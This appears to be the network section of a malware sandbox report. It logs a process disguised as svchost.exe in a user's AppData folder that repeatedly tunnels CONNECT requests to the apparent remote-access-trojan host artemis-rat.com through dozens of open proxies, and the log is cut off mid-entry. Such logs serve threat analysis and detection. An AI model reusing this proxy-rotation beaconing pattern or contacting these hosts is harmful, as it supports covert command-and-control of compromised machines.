2623	192.168.2.5	57646	185.5.251.142	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.090645075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.802151918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2624	192.168.2.5	58554	45.11.95.166	6002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.094918966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2625	192.168.2.5	55621	36.93.138.74	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.101970911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2626	192.168.2.5	58579	82.113.157.122	31280	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.101970911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2627	192.168.2.5	58590	18.135.211.182	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.107889891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.398782015 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2628	192.168.2.5	55829	72.167.222.113	4125	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.111002922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146059990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146831989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2629	192.168.2.5	58718	38.162.8.232	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.116511106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.527203083 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2630	192.168.2.5	58515	103.153.232.41	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.116699934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.942749023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.146413088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646369934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2631	192.168.2.5	58732	34.30.26.177	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.119267941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646049976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.333656073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.646399021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146486998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646730900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2632	192.168.2.5	58594	58.234.116.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.133690119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2633	192.168.2.5	58755	104.18.81.76	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.140244961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.294259071 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2634	192.168.2.5	58593	80.67.8.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.142781973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2635	192.168.2.5	58598	115.147.26.219	8082	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.142978907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880338907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.816102982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.771053076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.504502058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2636	192.168.2.5	58621	121.128.194.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.145128965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2637	192.168.2.5	58764	104.17.50.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.149324894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.306508064 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2638	192.168.2.5	58546	5.10.249.159	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.149924040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2639	192.168.2.5	58626	47.243.114.192	8180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.157043934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2640	192.168.2.5	58627	45.120.178.197	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.157526016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2641	192.168.2.5	57879	34.23.45.223	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.167938948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2642	192.168.2.5	58663	51.15.205.223	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.168124914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.833631992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.833754063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.645920992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146461010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2643	192.168.2.5	58629	154.12.178.107	29985	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.168282986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2644	192.168.2.5	58773	192.154.244.92	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.168406010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2645	192.168.2.5	58646	130.162.213.175	3129	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.168632030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2646	192.168.2.5	58743	129.213.150.205	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.181071043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2647	192.168.2.5	58610	34.88.54.123	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.181075096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.942547083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.942907095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.942852974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2648	192.168.2.5	58595	185.81.153.162	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.181101084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2649	192.168.2.5	58772	162.159.242.62	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.183809042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.344774961 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2650	192.168.2.5	58628	43.155.142.116	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.183866024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2651	192.168.2.5	58679	119.28.4.112	9999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.188275099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2652	192.168.2.5	58585	203.95.198.170	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.198503971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2653	192.168.2.5	58690	20.111.54.16	8123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.200139999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.498517990 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2654	192.168.2.5	58645	86.107.179.234	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.200581074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.067467928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.068213940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.126650095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2655	192.168.2.5	58289	117.160.250.132	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
